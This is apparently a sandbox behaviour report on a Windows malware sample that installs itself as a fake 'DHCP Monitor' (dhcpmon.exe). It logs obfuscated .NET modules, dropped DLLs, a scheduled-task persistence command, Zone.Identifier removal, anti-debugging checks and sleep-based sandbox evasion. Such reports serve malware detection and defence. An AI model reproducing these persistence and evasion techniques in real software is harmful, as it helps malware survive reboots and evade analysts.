        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 3_2_00401F16 push ecx; ret 3_2_00401F29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 3_1_00401F16 push ecx; ret 3_1_00401F29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 14_2_00401F16 push ecx; ret 14_2_00401F29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 14_2_051B7648 push eax; iretd 14_2_051B7649
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 14_2_05276E55 push FFFFFF8Bh; iretd 14_2_05276E57
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 14_1_00401F16 push ecx; ret 14_1_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 17_2_00401F16 push ecx; ret 17_2_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 17_2_051B7648 push eax; iretd 17_2_051B7649
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 17_2_05396E55 push FFFFFF8Bh; iretd 17_2_05396E57
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 17_1_00401F16 push ecx; ret 17_1_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 22_2_00401F16 push ecx; ret 22_2_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 22_2_04FB7648 push eax; iretd 22_2_04FB7649
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 22_2_05256E55 push FFFFFF8Bh; iretd 22_2_05256E57
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 22_1_00401F16 push ecx; ret 22_1_00401F29
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | File created: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | File created: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | File created: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | File created: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll

        Boot Survival:

        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'

        Hooking and other Techniques for Hiding and Protection:

        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | File opened: C:\Users\user\Desktop\bGf2H3tXGg.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Window / User API: threadDelayed 8951
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Window / User API: foregroundWindowGot 649
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Window / User API: foregroundWindowGot 744
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 1384 Thread sleep time: -38000s >= -30000s
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 6536 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 6508 Thread sleep time: -120000s >= -30000s
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 6472 Thread sleep time: -38000s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6604 Thread sleep time: -38000s >= -30000s
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 5088 Thread sleep count: 42 > 30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 7164 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6756 Thread sleep time: -38000s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6200 Thread sleep count: 44 > 30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1064 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5960 Thread sleep count: 39 > 30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6256 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_00404A29 FindFirstFileExW,3_2_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_1_00404A29 FindFirstFileExW,3_1_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_2_00404A29 FindFirstFileExW,14_2_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_1_00404A29 FindFirstFileExW,14_1_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 17_2_00404A29 FindFirstFileExW,17_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_2_00404A29 FindFirstFileExW,22_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_1_00404A29 FindFirstFileExW,22_1_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Thread delayed: delay time: 38000
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 38000
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 0_2_10001140 Cgrlcpdlsle,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,FindCloseChangeNotification,0_2_10001140
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 0_2_02282B1F mov eax, dword ptr fs:[00000030h] 0_2_02282B1F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 0_2_0228286F mov eax, dword ptr fs:[00000030h] 0_2_0228286F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_004035F1 mov eax, dword ptr fs:[00000030h] 3_2_004035F1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_1_004035F1 mov eax, dword ptr fs:[00000030h] 3_1_004035F1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 11_2_02992B1F mov eax, dword ptr fs:[00000030h] 11_2_02992B1F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 11_2_0299286F mov eax, dword ptr fs:[00000030h] 11_2_0299286F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 12_2_02442B1F mov eax, dword ptr fs:[00000030h] 12_2_02442B1F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 12_2_0244286F mov eax, dword ptr fs:[00000030h] 12_2_0244286F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_2_004035F1 mov eax, dword ptr fs:[00000030h] 14_2_004035F1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_1_004035F1 mov eax, dword ptr fs:[00000030h] 14_1_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 15_2_02852B1F mov eax, dword ptr fs:[00000030h] 15_2_02852B1F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 15_2_0285286F mov eax, dword ptr fs:[00000030h] 15_2_0285286F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 17_2_004035F1 mov eax, dword ptr fs:[00000030h] 17_2_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 17_1_004035F1 mov eax, dword ptr fs:[00000030h] 17_1_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_2_004035F1 mov eax, dword ptr fs:[00000030h] 22_2_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 22_1_004035F1 mov eax, dword ptr fs:[00000030h] 22_1_004035F1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_004067FE GetProcessHeap,3_2_004067FE
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_00401E1D SetUnhandledExceptionFilter,3_2_00401E1D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040446F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00401C88
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00401F30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_1_00401E1D SetUnhandledExceptionFilter,3_1_00401E1D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_1_0040446F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_1_00401C88
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 3_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_1_00401F30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_2_00401E1D SetUnhandledExceptionFilter,14_2_00401E1D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040446F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00401C88
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00401F30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_1_00401E1D SetUnhandledExceptionFilter,14_1_00401E1D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe Code function: 14_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_1_0040446F
